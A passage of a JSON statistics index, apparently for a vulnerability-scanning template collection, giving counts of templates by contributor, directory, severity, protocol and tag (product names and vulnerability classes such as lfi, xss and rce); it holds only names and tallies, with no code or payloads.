(@palaziv)","count":1},{"name":"evolutionsec","count":1},{"name":"mesaglio","count":1},{"name":"sshell","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"sullo","count":1},{"name":"kabirsuda","count":1},{"name":"smaranchand","count":1},{"name":"luskabol","count":1},{"name":"kareemse1im","count":1},{"name":"52971","count":1},{"name":"rojanrijal","count":1},{"name":"qlkwej","count":1},{"name":"nytr0gen","count":1},{"name":"wabafet","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"0h1in9e","count":1},{"name":"b4uh0lz","count":1},{"name":"aresx","count":1},{"name":"hanlaomo","count":1},{"name":"schniggie","count":1},{"name":"chron0x","count":1},{"name":"naglinagli","count":1},{"name":"remonsec","count":1},{"name":"co0nan","count":1},{"name":"alph4byt3","count":1},{"name":"juicypotato1","count":1},{"name":"alperenkesk","count":1},{"name":"d0rkerdevil","count":1},{"name":"rotemreiss","count":1},{"name":"izn0u","count":1},{"name":"ahmed sherif","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"hakluke","count":1},{"name":"nerrorsec","count":1},{"name":"iampritam","count":1},{"name":"ilovebinbash","count":1},{"name":"pudsec","count":1},{"name":"shreyapohekar","count":1},{"name":"ahmetpergamum","count":1},{"name":"fopina","count":1},{"name":"s1r1u5_","count":1},{"name":"ajaysenr","count":1},{"name":"philippdelteil","count":1},{"name":"andirrahmani1","count":1},{"name":"0ut0fb4nd","count":1},{"name":"push4d","count":1},{"name":"pdp","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"noamrathaus","count":1},{"name":"_c0wb0y_","count":1},{"name":"bad5ect0r","count":1},{"name":"0xteles","count":1},{"name":"whynotke","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"absshax","count":1},{"name":"mah3sec_","count":1},{"name":"ohlinge","count":1},{"name":"un-fmunozs","count":1},{"name":"x6263","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"thezakman","count":1},{"name":"kurohost","count":1},{"name":"ldionmarcil","count":1},{"name":"bolli95","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"akash.c","count":1},{"name":"becivells","count":1},{"name":"ooooooo_q","count":1},{"name":"raesene","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"mass0ma","count":1},{"name":"akshansh","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"zandros0","count":1},{"name":"shelld3v","count":1},{"name":"taielab","count":1}],"directory":[{"name":"cves","count":803},{"name":"vulnerabilities","count":312},{"name":"exposed-panels","count":250},{"name":"technologies","count":197},{"name":"exposures","count":188},{"name":"misconfiguration","count":136},{"name":"takeovers","count":64},{"name":"default-logins","count":56},{"name":"file","count":46},{"name":"workflows","count":37},{"name":"network","count":34},{"name":"iot","count":25},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":658},{"name":"high","count":620},{"name":"medium","count":463},{"name":"critical","count":276},{"name":"low","count":154}],"types":[{"name":"http","count":2065},{"name":"file","count":46},{"name":"network","count":43},{"name":"dns","count":12}]} +{"tags":[{"name":"cve","count":803},{"name":"lfi","count":325},{"name":"xss","count":253},{"name":"panel","count":252},{"name":"wordpress","count":241},{"name":"exposure","count":233},{"name":"rce","count":200},{"name":"tech","count":190},{"name":"wp-plugin","count":167},{"name":"cve2020","count":164},{"name":"cve2021","count":139},{"name":"joomla","count":128},{"name":"cve2010","count":108},{"name":"cve2019","count":96},{"name":"config","count":94},{"name":"cve2018","count":86},{"name":"apache","count":70},{"name":"takeover","count":68},{"name":"iot","count":66},{"name":"token","count":65},{"name":"default-login","count":64},{"name":"oob","count":57},{"name":"cve2017","count":50},{"name":"unauth","count":47},{"name":"file","count":46},{"name":"network","count":43},{"name":"ssrf","count":40},{"name":"sqli","count":38},{"name":"","count":37},{"name":"cve2016","count":36},{"name":"oracle","count":36},{"name":"redirect","count":34},{"name":"logs","count":30},{"name":"jira","count":28},{"name":"listing","count":27},{"name":"cve2014","count":27},{"name":"atlassian","count":27},{"name":"cve2015","count":26},{"name":"misc","count":23},{"name":"auth-bypass","count":23},{"name":"generic","count":23},{"name":"disclosure","count":22},{"name":"router","count":20},{"name":"cisco","count":19},{"name":"aem","count":19},{"name":"sap","count":18},{"name":"debug","count":18},{"name":"misconfig","count":18},{"name":"springboot","count":18},{"name":"cve2012","count":17},{"name":"php","count":16},{"name":"cve2011","count":15},{"name":"fuzz","count":14},{"name":"cve2009","count":14},{"name":"login","count":14},{"name":"weblogic","count":14},{"name":"struts","count":14},{"name":"adobe","count":13},{"name":"zoho","count":13},{"name":"devops","count":13},{"name":"android","count":13},{"name":"dns","count":13},{"name":"aws","count":12},{"name":"jenkins","count":12},{"name":"dlink","count":12},{"name":"manageengine","count":12},{"name":"wp-theme","count":11},{"name":"cve2013","count":11},{"name":"dell","count":10},{"name":"xxe","count":10},{"name":"vmware","count":9},{"name":"magento","count":9},{"name":"ftp","count":9},{"name":"intrusive","count":9},{"name":"scada","count":8},{"name":"nginx","count":8},{"name":"cve2008","count":8},{"name":"ruijie","count":8},{"name":"cnvd","count":8},{"name":"rails","count":8},{"name":"airflow","count":8},{"name":"gitlab","count":8},{"name":"cms","count":7},{"name":"ibm","count":7},{"name":"files","count":7},{"name":"google","count":7},{"name":"confluence","count":7},{"name":"netgear","count":7},{"name":"backup","count":7},{"name":"coldfusion","count":7},{"name":"kubernetes","count":7},{"name":"microsoft","count":7},{"name":"rconfig","count":6},{"name":"solr","count":6},{"name":"api","count":6},{"name":"django","count":6},{"name":"docker","count":6},{"name":"hp","count":6},{"name":"camera","count":6},{"name":"jetty","count":6},{"name":"citrix","count":6},{"name":"laravel","count":6},{"name":"drupal","count":5},{"name":"iis","count":5},{"name":"nodejs","count":5},{"name":"tomcat","count":5},{"name":"java","count":5},{"name":"fileupload","count":5},{"name":"jolokia","count":5},{"name":"circarlife","count":5},{"name":"windows","count":5},{"name":"dedecms","count":5},{"name":"deserialization","count":5},{"name":"phpmyadmin","count":5},{"name":"ssti","count":5},{"name":"headless","count":5},{"name":"lucee","count":5},{"name":"printer","count":5},{"name":"symantec","count":4},{"name":"artifactory","count":4},{"name":"proxy","count":4},{"name":"crlf","count":4},{"name":"strapi","count":4},{"name":"zabbix","count":4},{"name":"firmware","count":4},{"name":"rfi","count":4},{"name":"samsung","count":4},{"name":"resin","count":4},{"name":"wso2","count":4},{"name":"magmi","count":4},{"name":"git","count":4},{"name":"buffalo","count":4},{"name":"traversal","count":4},{"name":"solarwinds","count":4},{"name":"hongdian","count":4},{"name":"glpi","count":4},{"name":"vpn","count":4},{"name":"exchange","count":4},{"name":"symfony","count":4},{"name":"moodle","count":4},{"name":"thinkphp","count":4},{"name":"fatpipe","count":4},{"name":"elastic","count":4},{"name":"zimbra","count":4},{"name":"thinkcmf","count":4},{"name":"asp","count":4},{"name":"webserver","count":4},{"name":"grafana","count":4},{"name":"injection","count":3},{"name":"backups","count":3},{"name":"nacos","count":3},{"name":"firebase","count":3},{"name":"cacti","count":3},{"name":"openam","count":3},{"name":"jeesns","count":3},{"name":"openssh","count":3},{"name":"smtp","count":3},{"name":"opensis","count":3},{"name":"amazon","count":3},{"name":"itop","count":3},{"name":"fpd","count":3},{"name":"tikiwiki","count":3},{"name":"linkerd","count":3},{"name":"kibana","count":3},{"name":"mail","count":3},{"name":"lfr","count":3},{"name":"log","count":3},{"name":"mongodb","count":3},{"name":"nexus","count":3},{"name":"targa","count":3},{"name":"r-seenet","count":3},{"name":"druid","count":3},{"name":"microstrategy","count":3},{"name":"jellyfin","count":3},{"name":"ssh","count":3},{"name":"hoteldruid","count":3},{"name":"cve2007","count":3},{"name":"kafka","count":3},{"name":"npm","count":3},{"name":"prometheus","count":3},{"name":"httpd","count":3},{"name":"fanruan","count":3},{"name":"azure","count":3},{"name":"slack","count":3},{"name":"zhiyuan","count":3},{"name":"bitrix","count":3},{"name":"caucho","count":3},{"name":"backdoor","count":3},{"name":"oa","count":3},{"name":"nosqli","count":3},{"name":"ebs","count":3},{"name":"vbulletin","count":3},{"name":"ofbiz","count":3},{"name":"bigip","count":3},{"name":"kevinlab","count":3},{"name":"telerik","count":3},{"name":"terramaster","count":3},{"name":"springcloud","count":3},{"name":"showdoc","count":2},{"name":"splunk","count":2},{"name":"aruba","count":2},{"name":"harbor","count":2},{"name":"node","count":2},{"name":"chyrp","count":2},{"name":"odoo","count":2},{"name":"totemomail","count":2},{"name":"ecoa","count":2},{"name":"glassfish","count":2},{"name":"axis","count":2},{"name":"enumeration","count":2},{"name":"saltstack","count":2},{"name":"chiyu","count":2},{"name":"frp","count":2},{"name":"avantfax","count":2},{"name":"guacamole","count":2},{"name":"geowebserver","count":2},{"name":"nextjs","count":2},{"name":"paloalto","count":2},{"name":"waf","count":2},{"name":"igs","count":2},{"name":"pega","count":2},{"name":"sonarqube","count":2},{"name":"status","count":2},{"name":"sonicwall","count":2},{"name":"yapi","count":2},{"name":"ucmdb","count":2},{"name":"cve2005","count":2},{"name":"kentico","count":2},{"name":"payara","count":2},{"name":"bypass","count":2},{"name":"wordfence","count":2},{"name":"service","count":2},{"name":"idrac","count":2},{"name":"activemq","count":2},{"name":"fortios","count":2},{"name":"icewarp","count":2},{"name":"maian","count":2},{"name":"liferay","count":2},{"name":"minio","count":2},{"name":"openvpn","count":2},{"name":"spark","count":2},{"name":"bucket","count":2},{"name":"vrealize","count":2},{"name":"trixbox","count":2},{"name":"storage","count":2},{"name":"dos","count":2},{"name":"globalprotect","count":2},{"name":"dolibarr","count":2},{"name":"hostheader-injection","count":2},{"name":"keycloak","count":2},{"name":"sharepoint","count":2},{"name":"nagios","count":2},{"name":"ec2","count":2},{"name":"shellshock","count":2},{"name":"jsf","count":2},{"name":"jeedom","count":2},{"name":"linux","count":2},{"name":"hpe","count":2},{"name":"mcafee","count":2},{"name":"commax","count":2},{"name":"yii","count":2},{"name":"db","count":2},{"name":"phpcollab","count":2},{"name":"netsweeper","count":2},{"name":"netis","count":2},{"name":"rstudio","count":2},{"name":"flir","count":2},{"name":"seeyon","count":2},{"name":"middleware","count":2},{"name":"qcubed","count":2},{"name":"openfire","count":2},{"name":"wuzhicms","count":2},{"name":"couchdb","count":2},{"name":"ecology","count":2},{"name":"xxljob","count":2},{"name":"kong","count":2},{"name":"prestashop","count":2},{"name":"ilo","count":2},{"name":"nextcloud","count":2},{"name":"mida","count":2},{"name":"sitecore","count":2},{"name":"github","count":2},{"name":"hjtcloud","count":2},{"name":"oauth","count":2},{"name":"vcenter","count":2},{"name":"leak","count":2},{"name":"adminer","count":2},{"name":"bruteforce","count":2},{"name":"chamilo","count":2},{"name":"grav","count":2},{"name":"natshell","count":2},{"name":"axis2","count":2},{"name":"rockmongo","count":2},{"name":"huawei","count":2},{"name":"hashicorp","count":2},{"name":"prtg","count":2},{"name":"voipmonitor","count":2},{"name":"emerge","count":2},{"name":"akkadian","count":2},{"name":"getsimple","count":2},{"name":"horde","count":2},{"name":"akamai","count":2},{"name":"favicon","count":2},{"name":"plesk","count":2},{"name":"cache","count":2},{"name":"tidb","count":2},{"name":"jboss","count":2},{"name":"smb","count":2},{"name":"hasura","count":2},{"name":"webcam","count":2},{"name":"aviatrix","count":2},{"name":"wmt","count":1},{"name":"bookstack","count":1},{"name":"weiphp","count":1},{"name":"oneblog","count":1},{"name":"octoprint","count":1},{"name":"graphite","count":1},{"name":"nps","count":1},{"name":"krweb","count":1},{"name":"oidc","count":1},{"name":"blind","count":1},{"name":"zcms","count":1},{"name":"acontent","count":1},{"name":"zeroshell","count":1},{"name":"codemeter","count":1},{"name":"owa","count":1},{"name":"uwsgi","count":1},{"name":"elascticsearch","count":1},{"name":"subrion","count":1},{"name":"dotnetnuke","count":1},{"name":"wifisky","count":1},{"name":"gitea","count":1},{"name":"pcoip","count":1},{"name":"duomicms","count":1},{"name":"simplecrm","count":1},{"name":"gloo","count":1},{"name":" default-login","count":1},{"name":"ulterius","count":1},{"name":"nimble","count":1},{"name":"auth","count":1},{"name":"etherpad","count":1},{"name":"fortinet","count":1},{"name":"spf","count":1},{"name":"geddy","count":1},{"name":"database","count":1},{"name":"chinaunicom","count":1},{"name":"lotus","count":1},{"name":"whm","count":1},{"name":"eprints","count":1},{"name":"pmb","count":1},{"name":"csrf","count":1},{"name":"omi","count":1},{"name":"bigbluebutton","count":1},{"name":"camunda","count":1},{"name":"frontpage","count":1},{"name":"magicflow","count":1},{"name":"rmi","count":1},{"name":"webadmin","count":1},{"name":"karel","count":1},{"name":"cse","count":1},{"name":"tamronos","count":1},{"name":"metinfo","count":1},{"name":"mailchimp","count":1},{"name":"keenetic","count":1},{"name":"plugin","count":1},{"name":"rocketchat","count":1},{"name":"lutron","count":1},{"name":"cve2006","count":1},{"name":"pagespeed","count":1},{"name":"linksys","count":1},{"name":"centreon","count":1},{"name":"trilithic","count":1},{"name":"ilo4","count":1},{"name":"influxdb","count":1},{"name":"bazarr","count":1},{"name":"fiori","count":1},{"name":"tenda","count":1},{"name":"mariadb","count":1},{"name":"memcached","count":1},{"name":"lg-nas","count":1},{"name":"htmli","count":1},{"name":"gitlist","count":1},{"name":"clave","count":1},{"name":"sentry","count":1},{"name":"olivetti","count":1},{"name":"lancom","count":1},{"name":"sophos","count":1},{"name":"lotuscms","count":1},{"name":"glances","count":1},{"name":"openrestry","count":1},{"name":"javascript","count":1},{"name":"webftp","count":1},{"name":"moin","count":1},{"name":"testrail","count":1},{"name":"b2evolution","count":1},{"name":"spectracom","count":1},{"name":"owasp","count":1},{"name":"ognl","count":1},{"name":"phpfastcache","count":1},{"name":"linkedin","count":1},{"name":"ueditor","count":1},{"name":"hadoop","count":1},{"name":"eyou","count":1},{"name":"imap","count":1},{"name":"tcexam","count":1},{"name":"pacsone","count":1},{"name":"azkaban","count":1},{"name":"webui","count":1},{"name":"miscrsoft","count":1},{"name":"ioncube","count":1},{"name":"grails","count":1},{"name":"oscommerce","count":1},{"name":"stem","count":1},{"name":"tensorflow","count":1},{"name":"fastcgi","count":1},{"name":"apiman","count":1},{"name":"circontrol","count":1},{"name":"nuxeo","count":1},{"name":"rubedo","count":1},{"name":"apos","count":1},{"name":"jenkin","count":1},{"name":"default","count":1},{"name":"mobileiron","count":1},{"name":"kerbynet","count":1},{"name":"powercreator","count":1},{"name":"kubeflow","count":1},{"name":"discourse","count":1},{"name":"processmaker","count":1},{"name":"bedita","count":1},{"name":"opentsdb","count":1},{"name":"spring","count":1},{"name":"checkpoint","count":1},{"name":"node-red-dashboard","count":1},{"name":"tjws","count":1},{"name":"myvuehelp","count":1},{"name":"bolt","count":1},{"name":"upload","count":1},{"name":"vidyo","count":1},{"name":"zms","count":1},{"name":"daybyday","count":1},{"name":"maxsite","count":1},{"name":"szhe","count":1},{"name":"kindeditor","count":1},{"name":"gateone","count":1},{"name":"fortiweb","count":1},{"name":"kafdrop","count":1},{"name":"ricoh","count":1},{"name":"wamp","count":1},{"name":"gotmls","count":1},{"name":"calendarix","count":1},{"name":"skywalking","count":1},{"name":"elfinder","count":1},{"name":"cloudflare","count":1},{"name":"vnc","count":1},{"name":"dotclear","count":1},{"name":"cherokee","count":1},{"name":"resourcespace","count":1},{"name":"mongo","count":1},{"name":"huijietong","count":1},{"name":"sprintful","count":1},{"name":"panos","count":1},{"name":"plc","count":1},{"name":"extractor","count":1},{"name":"rabbitmq","count":1},{"name":"kyan","count":1},{"name":"erp-nc","count":1},{"name":"nordex","count":1},{"name":"monitorr","count":1},{"name":"office365","count":1},{"name":"rhymix","count":1},{"name":"postgres","count":1},{"name":"zookeeper","count":1},{"name":"k8","count":1},{"name":"codeigniter","count":1},{"name":"realteo","count":1},{"name":"javafaces","count":1},{"name":"redcap","count":1},{"name":"cockpit","count":1},{"name":"saltapi","count":1},{"name":"mirai","count":1},{"name":"springframework","count":1},{"name":"bitly","count":1},{"name":"sourcebans","count":1},{"name":"majordomo2","count":1},{"name":"empirecms","count":1},{"name":"glowroot","count":1},{"name":"craftcms","count":1},{"name":"ems","count":1},{"name":"wildfly","count":1},{"name":"etouch","count":1},{"name":"hiawatha","count":1},{"name":"exacqvision","count":1},{"name":"servicedesk","count":1},{"name":"soar","count":1},{"name":"visionhub","count":1},{"name":"appweb","count":1},{"name":"traefik","count":1},{"name":"darkstat","count":1},{"name":"werkzeug","count":1},{"name":"ns","count":1},{"name":"logontracer","count":1},{"name":"timesheet","count":1},{"name":"sqlite","count":1},{"name":"openemr","count":1},{"name":"pyramid","count":1},{"name":"rujjie","count":1},{"name":"lansweeper","count":1},{"name":"sangfor","count":1},{"name":"commscope","count":1},{"name":"ssltls","count":1},{"name":"perl","count":1},{"name":"accela","count":1},{"name":"avtech","count":1},{"name":"jmx","count":1},{"name":"rsyncd","count":1},{"name":"bullwark","count":1},{"name":"cors","count":1},{"name":"dnssec","count":1},{"name":"trane","count":1},{"name":"thinkadmin","count":1},{"name":"embedthis","count":1},{"name":"avalanche","count":1},{"name":"mantisbt","count":1},{"name":"viewlinc","count":1},{"name":"landray","count":1},{"name":"listserv","count":1},{"name":"vscode","count":1},{"name":"cgi","count":1},{"name":"postmessage","count":1},{"name":"visualtools","count":1},{"name":"h3c-imc","count":1},{"name":"csod","count":1},{"name":"jitsi","count":1},{"name":"cocoon","count":1},{"name":"maccmsv10","count":1},{"name":"zyxel","count":1},{"name":"fortigates","count":1},{"name":"svnserve","count":1},{"name":"jquery","count":1},{"name":"sco","count":1},{"name":"livezilla","count":1},{"name":"dvwa","count":1},{"name":"mysql","count":1},{"name":"meraki","count":1},{"name":"acme","count":1},{"name":"tpshop","count":1},{"name":"hiboss","count":1},{"name":"phpwiki","count":1},{"name":"jnoj","count":1},{"name":"smartsense","count":1},{"name":"artica","count":1},{"name":"beanstalk","count":1},{"name":"pgadmin","count":1},{"name":"xmlchart","count":1},{"name":"jenzabar","count":1},{"name":"ghost","count":1},{"name":"openerp","count":1},{"name":"terraform","count":1},{"name":"jeewms","count":1},{"name":"clusterengine","count":1},{"name":"synnefo","count":1},{"name":"nweb2fax","count":1},{"name":"clink-office","count":1},{"name":"vsphere","count":1},{"name":"expressjs","count":1},{"name":"couchbase","count":1},{"name":"beanshell","count":1},{"name":"xiuno","count":1},{"name":"shopxo","count":1},{"name":"gunicorn","count":1},{"name":"actuator","count":1},{"name":"gsoap","count":1},{"name":"shoretel","count":1},{"name":"concrete","count":1},{"name":"ecom","count":1},{"name":"cloudinary","count":1},{"name":"vsftpd","count":1},{"name":"salesforce","count":1},{"name":"selea","count":1},{"name":"sql","count":1},{"name":"primetek","count":1},{"name":"wavlink","count":1},{"name":"redwood","count":1},{"name":"tensorboard","count":1},{"name":"faraday","count":1},{"name":"scs","count":1},{"name":"shiro","count":1},{"name":"burp","count":1},{"name":"sage","count":1},{"name":"twitter-server","count":1},{"name":"cerebro","count":1},{"name":"mantis","count":1},{"name":"emby","count":1},{"name":"fortilogger","count":1},{"name":"goahead","count":1},{"name":"mongoshake","count":1},{"name":"fortigate","count":1},{"name":"panabit","count":1},{"name":"portainer","count":1},{"name":"graphql","count":1},{"name":"redhat","count":1},{"name":"tieline","count":1},{"name":"dom","count":1},{"name":"timeclock","count":1},{"name":"drone","count":1},{"name":"finereport","count":1},{"name":"mpsec","count":1},{"name":"esmtp","count":1},{"name":"doh","count":1},{"name":"opm","count":1},{"name":"rmc","count":1},{"name":"alerta","count":1},{"name":"tracer","count":1},{"name":"jsp","count":1},{"name":"moinmoin","count":1},{"name":"spidercontrol","count":1},{"name":"wooyun","count":1},{"name":"nsasg","count":1},{"name":"heroku","count":1},{"name":"tika","count":1},{"name":"mediumish","count":1},{"name":"clockwatch","count":1},{"name":"proftpd","count":1},{"name":"plastic","count":1},{"name":"zarafa","count":1},{"name":"idemia","count":1},{"name":"zmanda","count":1},{"name":"addpac","count":1},{"name":"exposures","count":1},{"name":"pippoint","count":1},{"name":"acexy","count":1},{"name":"iceflow","count":1},{"name":"circontrorl","count":1},{"name":"tileserver","count":1},{"name":"seacms","count":1},{"name":"xunchi","count":1},{"name":"jfrog","count":1},{"name":"ruby","count":1},{"name":"nedi","count":1},{"name":"myucms","count":1},{"name":"starttls","count":1},{"name":"exponentcms","count":1},{"name":"k8s","count":1},{"name":"setup","count":1},{"name":"tectuus","count":1},{"name":"episerver","count":1},{"name":"asus","count":1},{"name":"fuelcms","count":1},{"name":"zzzcms","count":1},{"name":"tapestry","count":1},{"name":"eyelock","count":1},{"name":"comodo","count":1},{"name":"shopizer","count":1},{"name":"basic-auth","count":1},{"name":"wing-ftp","count":1},{"name":"websphere","count":1},{"name":"bash","count":1},{"name":"qvisdvr","count":1},{"name":"openx","count":1},{"name":"javamelody","count":1},{"name":"cyberoam","count":1},{"name":"hortonworks","count":1},{"name":"solarlog","count":1},{"name":"shopware","count":1},{"name":"aspnuke","count":1},{"name":"announcekit","count":1},{"name":"graylog","count":1},{"name":"razor","count":1},{"name":"netgenie","count":1},{"name":"pulsesecure","count":1},{"name":"ssl","count":1},{"name":"nc2","count":1},{"name":"alertmanager","count":1},{"name":"swagger","count":1},{"name":"robomongo","count":1},{"name":"sidekiq","count":1},{"name":"biometrics","count":1},{"name":"zm","count":1},{"name":"dotnet","count":1},{"name":"crm","count":1},{"name":"nomad","count":1},{"name":"anchorcms","count":1},{"name":"lighttpd","count":1},{"name":"ruckus","count":1},{"name":"ntopng","count":1},{"name":"shoppable","count":1},{"name":"gilacms","count":1},{"name":"plone","count":1},{"name":"jaspersoft","count":1},{"name":"webmodule-ee","count":1},{"name":"74cms","count":1},{"name":"nette","count":1},{"name":"iptime","count":1},{"name":"expose","count":1},{"name":"elasticsearch","count":1},{"name":"cloudron","count":1},{"name":"pihole","count":1},{"name":"redis","count":1},{"name":"clickhouse","count":1},{"name":"haproxy","count":1},{"name":"xvr","count":1},{"name":"mrtg","count":1},{"name":"gstorage","count":1},{"name":"gurock","count":1},{"name":"sceditor","count":1},{"name":"email","count":1},{"name":"upnp","count":1},{"name":"svn","count":1},{"name":"aura","count":1},{"name":"nexusdb","count":1},{"name":"viewpoint","count":1},{"name":"chevereto","count":1},{"name":"clockwork","count":1},{"name":"gridx","count":1},{"name":"fedora","count":1},{"name":"woocomernce","count":1},{"name":"parentlink","count":1},{"name":"ganglia","count":1},{"name":"qdpm","count":1},{"name":"centos","count":1},{"name":"s3","count":1},{"name":"gespage","count":1},{"name":"fastapi","count":1},{"name":"qsan","count":1},{"name":"ambari","count":1},{"name":"domxss","count":1},{"name":"okta","count":1},{"name":"blackboard","count":1},{"name":"opensns","count":1},{"name":"klog","count":1},{"name":"zte","count":1},{"name":"alibaba","count":1},{"name":"netrc","count":1},{"name":"panasonic","count":1},{"name":"mdb","count":1},{"name":"servicenow","count":1},{"name":"yealink","count":1},{"name":"netmask","count":1},{"name":"openstack","count":1},{"name":"tongda","count":1},{"name":"st","count":1},{"name":"blue-ocean","count":1},{"name":"natemail","count":1},{"name":"adb","count":1},{"name":"gogs","count":1},{"name":"yzmcms","count":1},{"name":"landrayoa","count":1},{"name":"phpfusion","count":1},{"name":"wondercms","count":1},{"name":"interlib","count":1},{"name":"mautic","count":1},{"name":"xml","count":1},{"name":"turbocrm","count":1},{"name":"eg","count":1},{"name":"triconsole","count":1},{"name":"yachtcontrol","count":1},{"name":"spip","count":1},{"name":"smi","count":1},{"name":"api-manager","count":1},{"name":"octobercms","count":1},{"name":"rdp","count":1},{"name":"cobub","count":1},{"name":"dompdf","count":1},{"name":"arl","count":1},{"name":"scimono","count":1},{"name":"feifeicms","count":1},{"name":"mara","count":1},{"name":"labtech","count":1},{"name":"diris","count":1},{"name":"zenario","count":1},{"name":"socomec","count":1},{"name":"websvn","count":1},{"name":"phpshowtime","count":1},{"name":"optiLink","count":1},{"name":"metabase","count":1},{"name":"flink","count":1},{"name":"monitorix","count":1},{"name":"motorola","count":1},{"name":"wavemaker","count":1},{"name":"phpinfo","count":1},{"name":"wiki","count":1},{"name":"phalcon","count":1},{"name":"dvr","count":1},{"name":"webmin","count":1},{"name":"cofax","count":1},{"name":"smartblog","count":1},{"name":"dbeaver","count":1},{"name":"woocommerce","count":1},{"name":"opencast","count":1},{"name":"nifi","count":1},{"name":"rockethchat","count":1},{"name":"argussurveillance","count":1},{"name":"floc","count":1},{"name":"netdata","count":1},{"name":"minimouse","count":1},{"name":"sureline","count":1},{"name":"luftguitar","count":1},{"name":"sar2html","count":1},{"name":"nuuo","count":1},{"name":"emc","count":1},{"name":"redmine","count":1},{"name":"varnish","count":1},{"name":"wazuh","count":1},{"name":"froxlor","count":1},{"name":"zend","count":1},{"name":"novnc","count":1},{"name":"xampp","count":1},{"name":"opensmtpd","count":1},{"name":"solman","count":1},{"name":"sgp","count":1},{"name":"tor","count":1},{"name":"sarg","count":1},{"name":"cscart","count":1},{"name":"totaljs","count":1},{"name":"xdcms","count":1},{"name":"discord","count":1},{"name":"expn","count":1},{"name":"achecker","count":1},{"name":"geutebruck","count":1},{"name":"lanproxy","count":1},{"name":"phpunit","count":1},{"name":"ewebs","count":1}],"authors":[{"name":"daffainfo","count":280},{"name":"pikpikcu","count":277},{"name":"dhiyaneshdk","count":268},{"name":"pdteam","count":199},{"name":"geeknik","count":154},{"name":"dwisiswant0","count":131},{"name":"gy741","count":77},{"name":"pussycat0x","count":70},{"name":"princechaddha","count":63},{"name":"madrobot","count":61},{"name":"0x_akoko","count":43},{"name":"gaurang","count":42},{"name":"philippedelteil","count":27},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":14},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"righettod","count":10},{"name":"wdahlenb","count":10},{"name":"random_robbie","count":10},{"name":"melbadry9","count":9},{"name":"hackergautam","count":9},{"name":"nadino","count":9},{"name":"iamthefrogy","count":8},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"emadshanab","count":7},{"name":"0x240x23elu","count":7},{"name":"dogasantos","count":7},{"name":"kophjager007","count":7},{"name":"oppsec","count":7},{"name":"techryptic (@tech)","count":7},{"name":"dr_set","count":7},{"name":"harshbothra_","count":7},{"name":"meme-lord","count":7},{"name":"randomstr1ng","count":7},{"name":"puzzlepeaches","count":6},{"name":"pentest_swissky","count":6},{"name":"caspergn","count":6},{"name":"__fazal","count":6},{"name":"logicalhunter","count":6},{"name":"elsfa7110","count":5},{"name":"joanbono","count":5},{"name":"rootxharsh","count":5},{"name":"iamnoooob","count":5},{"name":"panch0r3d","count":5},{"name":"lu4nx","count":5},{"name":"yanyun","count":5},{"name":"ganofins","count":5},{"name":"xelkomy","count":4},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"nodauf","count":4},{"name":"z3bd","count":3},{"name":"f1tz","count":3},{"name":"incogbyte","count":3},{"name":"binaryfigments","count":3},{"name":"dudez","count":3},{"name":"vsh00t","count":3},{"name":"idealphase","count":3},{"name":"skeltavik","count":3},{"name":"fyoorer","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"_generic_human_","count":3},{"name":"emenalf","count":3},{"name":"jarijaas","count":3},{"name":"unstabl3","count":3},{"name":"shine","count":3},{"name":"johnk3r","count":3},{"name":"thomas_from_offensity","count":3},{"name":"tess","count":3},{"name":"sushantkamble","count":3},{"name":"0w4ys","count":3},{"name":"mavericknerd","count":3},{"name":"shifacyclewala","count":3},{"name":"impramodsargar","count":3},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"vavkamil","count":2},{"name":"kiblyn11","count":2},{"name":"r3naissance","count":2},{"name":"amsda","count":2},{"name":"0xsapra","count":2},{"name":"moritz nentwig","count":2},{"name":"gevakun","count":2},{"name":"ree4pwn","count":2},{"name":"joeldeleep","count":2},{"name":"fabaff","count":2},{"name":"cocxanh","count":2},{"name":"hetroublemakr","count":2},{"name":"0xprial","count":2},{"name":"ehsahil","count":2},{"name":"0xsmiley","count":2},{"name":"foulenzer","count":2},{"name":"mohammedsaneem","count":2},{"name":"davidmckennirey","count":2},{"name":"bp0lr","count":2},{"name":"nkxxkn","count":2},{"name":"manas_harsh","count":2},{"name":"johnjhacking","count":2},{"name":"dheerajmadhukar","count":2},{"name":"socketz","count":2},{"name":"hahwul","count":2},{"name":"zomsop82","count":2},{"name":"swissky","count":2},{"name":"0xcrypto","count":2},{"name":"0xrudra","count":2},{"name":"afaq","count":2},{"name":"randomrobbie","count":2},{"name":"huowuzhao","count":2},{"name":"alifathi-h1","count":2},{"name":"0xelkomy","count":2},{"name":"arcc","count":2},{"name":"gal nagli","count":2},{"name":"whoever","count":2},{"name":"parth","count":2},{"name":"pxmme1337","count":2},{"name":"random-robbie","count":2},{"name":"lotusdll","count":2},{"name":"bernardofsr","count":2},{"name":"x1m_martijn","count":2},{"name":"convisoappsec","count":2},{"name":"g4l1t0","count":2},{"name":"bing0o","count":2},{"name":"bsysop","count":2},{"name":"udit_thakkur","count":2},{"name":"w4cky_","count":2},{"name":"koti2","count":2},{"name":"defr0ggy","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"omarkurt","count":1},{"name":"@dwisiswant0","count":1},{"name":"jeya seelan","count":1},{"name":"ringo","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"sullo","count":1},{"name":"flag007","count":1},{"name":"ipanda","count":1},{"name":"rojanrijal","count":1},{"name":"elouhi","count":1},{"name":"ahmetpergamum","count":1},{"name":"ahmed 